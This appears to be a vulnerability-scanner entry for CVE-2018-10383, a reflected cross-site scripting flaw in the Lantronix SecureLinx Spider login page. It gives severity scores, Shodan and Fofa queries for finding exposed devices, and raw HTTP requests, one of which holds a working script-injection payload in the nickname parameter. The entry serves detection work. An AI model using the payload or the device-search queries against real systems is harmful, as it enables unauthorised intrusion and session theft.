| Title | Lantronix SecureLinx Spider (SLS) 2.2+ - Cross-Site Scripting |
|---|---|
| Author | ritikchaddha |
| Severity | Medium |
| Impact | Attackers can execute arbitrary JavaScript in victims' browsers, potentially stealing session cookies, credentials, or performing actions on behalf of users. |
| Remediation | Apply the latest security patches from Lantronix or upgrade to a patched firmware version. |
| CVSS Score | 6.1 |
| EPSS Score | 0.05855 |
| CVE ID | CVE-2018-10383 |
| CWE ID | CWE-79 |
| Shodan Query | title:"Lantronix" |
| Fofa Query | title="Lantronix" |
| Tags | cve cve2022 lantronix securelinx sls xss vuln |
Lantronix SecureLinx Spider (SLS) 2.2+ devices have XSS in the auth.asp login page.
GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:137.0) Gecko/20100101 Firefox/137.0
Connection: close
Accept-Encoding: gzip
GET /auth.asp?nickname=%22%3E%3Cstyle%20onload%3D%22alert(document.domain)%22%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-10383.yaml
🦈 Packet Capture: ⬇️ Download cve-2018-10383.pcap
N/AN/A